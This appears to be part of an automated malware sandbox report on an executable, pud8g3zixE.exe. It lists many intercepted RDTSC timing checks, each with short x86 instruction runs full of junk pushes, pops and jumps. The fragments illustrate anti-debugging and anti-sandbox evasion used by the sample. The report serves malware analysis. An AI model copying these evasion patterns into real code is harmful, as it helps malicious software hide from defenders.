Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11B293A second address: 11B2955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jp 00007FD164C5471Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007FD164C54716h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11B542C second address: 11B5433 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11B5433 second address: 11B5439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11B5439 second address: 11B5445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11B5445 second address: 11B5453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11B5453 second address: 11B545E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD164D1C756h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11B545E second address: 11B5478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD164C54726h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11B571F second address: 11B573C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FD164D1C764h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11B7F75 second address: 11B7F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD164C5471Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11B7C7D second address: 11B7C97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FD164D1C75Fh 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11BEC46 second address: 11BEC62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD164C54728h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11BD624 second address: 11BD641 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C760h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FD164D1C79Eh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11BD641 second address: 11BD647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11BD647 second address: 11BD660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD164D1C761h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11BDC60 second address: 11BDC64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11BDC64 second address: 11BDC72 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD164D1C756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11BDC72 second address: 11BDC78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11BDC78 second address: 11BDC7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11BDC7C second address: 11BDC80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11BDC80 second address: 11BDCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD164D1C756h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f je 00007FD164D1C756h 0x00000015 jmp 00007FD164D1C75Dh 0x0000001a push esi 0x0000001b pop esi 0x0000001c je 00007FD164D1C756h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11BDF9C second address: 11BDFD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD164C54720h 0x00000009 jo 00007FD164C54716h 0x0000000f jmp 00007FD164C54724h 0x00000014 popad 0x00000015 pushad 0x00000016 jnl 00007FD164C54716h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11C2291 second address: 11C2297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11C2297 second address: 11C229B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11C2436 second address: 11C245E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD164D1C756h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FD164D1C764h 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11C5CF3 second address: 11C5CF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11C6266 second address: 11C626E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11CDF95 second address: 11CDF9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11CDF9B second address: 11CDFB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 jnc 00007FD164D1C756h 0x0000000c jp 00007FD164D1C756h 0x00000012 pop esi 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 pushad 0x00000017 popad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11CDFB7 second address: 11CDFC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11CDFC0 second address: 11CDFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD164D1C768h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11CDFDC second address: 11CE025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD164C5471Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e jns 00007FD164C54716h 0x00000014 jmp 00007FD164C54723h 0x00000019 jmp 00007FD164C54725h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11CE025 second address: 11CE02F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD164D1C756h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11CE02F second address: 11CE042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD164C5471Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11CC9D9 second address: 11CC9F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD164D1C766h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11CCCF2 second address: 11CCCF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11D05DB second address: 11D05DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11D3D39 second address: 11D3D5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD164C54720h 0x00000009 jmp 00007FD164C5471Dh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11D3D5A second address: 11D3D68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11D3FD0 second address: 11D3FD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11D3FD6 second address: 11D4058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FD164D1C761h 0x0000000c pushad 0x0000000d jmp 00007FD164D1C765h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007FD164D1C761h 0x00000019 jmp 00007FD164D1C762h 0x0000001e popad 0x0000001f jc 00007FD164D1C758h 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b jmp 00007FD164D1C766h 0x00000030 push ecx 0x00000031 pop ecx 0x00000032 pushad 0x00000033 popad 0x00000034 popad 0x00000035 js 00007FD164D1C758h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1120FDA second address: 1120FE4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1120FE4 second address: 1121003 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD164D1C769h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1121003 second address: 1121007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1121007 second address: 112100B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11DFD1E second address: 11DFD22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11DFD22 second address: 11DFD5D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD164D1C764h 0x00000008 jne 00007FD164D1C75Eh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD164D1C763h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11DFE9E second address: 11DFEA5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E0441 second address: 11E044D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FD164D1C756h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E044D second address: 11E0475 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD164C5471Bh 0x00000008 jmp 00007FD164C5471Bh 0x0000000d jl 00007FD164C54716h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007FD164C54716h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E0864 second address: 11E0881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FD164D1C762h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E0881 second address: 11E0885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E09A6 second address: 11E09AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E09AC second address: 11E09B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E09B1 second address: 11E09B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E09B7 second address: 11E09BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E09BB second address: 11E09C5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD164D1C756h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E0B6C second address: 11E0B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E0B71 second address: 11E0B76 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E1298 second address: 11E12B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD164C54726h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E12B6 second address: 11E12C0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD164D1C756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E12C0 second address: 11E12C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E12C5 second address: 11E12CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E1AF4 second address: 11E1AFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E1AFC second address: 11E1B01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11DF920 second address: 11DF92F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD164C54716h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11DF92F second address: 11DF933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E4E86 second address: 11E4EBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FD164C54716h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD164C5471Ah 0x00000011 popad 0x00000012 push esi 0x00000013 jmp 00007FD164C54728h 0x00000018 push esi 0x00000019 push esi 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E95BF second address: 11E95C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E95C3 second address: 11E95DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C54720h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E95DA second address: 11E9606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD164D1C756h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD164D1C75Bh 0x00000012 jmp 00007FD164D1C764h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E9606 second address: 11E960A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E960A second address: 11E961E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jng 00007FD164D1C756h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E977A second address: 11E9780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E9780 second address: 11E9784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E9784 second address: 11E9795 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C5471Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E9795 second address: 11E979B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E98CF second address: 11E98D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11E98D3 second address: 11E98D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11F7FF0 second address: 11F7FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11F7B28 second address: 11F7B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11F7B2C second address: 11F7B4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD164C54725h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11F7B4B second address: 11F7B51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11F7CDB second address: 11F7CE5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD164C54716h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11FDF55 second address: 11FDF86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C75Ch 0x00000007 jmp 00007FD164D1C75Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a js 00007FD164D1C756h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11FDF86 second address: 11FDF8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11FD9B2 second address: 11FD9E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD164D1C756h 0x0000000a pop edi 0x0000000b jmp 00007FD164D1C766h 0x00000010 pushad 0x00000011 jns 00007FD164D1C756h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a jng 00007FD164D1C75Eh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11FDB25 second address: 11FDB3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 ja 00007FD164C5471Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11FDB3A second address: 11FDB59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD164D1C765h 0x00000009 jnc 00007FD164D1C756h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11FDB59 second address: 11FDB5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 120B464 second address: 120B46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 120F39A second address: 120F3A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 120F3A5 second address: 120F3A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 120F3A9 second address: 120F3C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FD164C54722h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 120F3C7 second address: 120F3E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C75Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD164D1C758h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
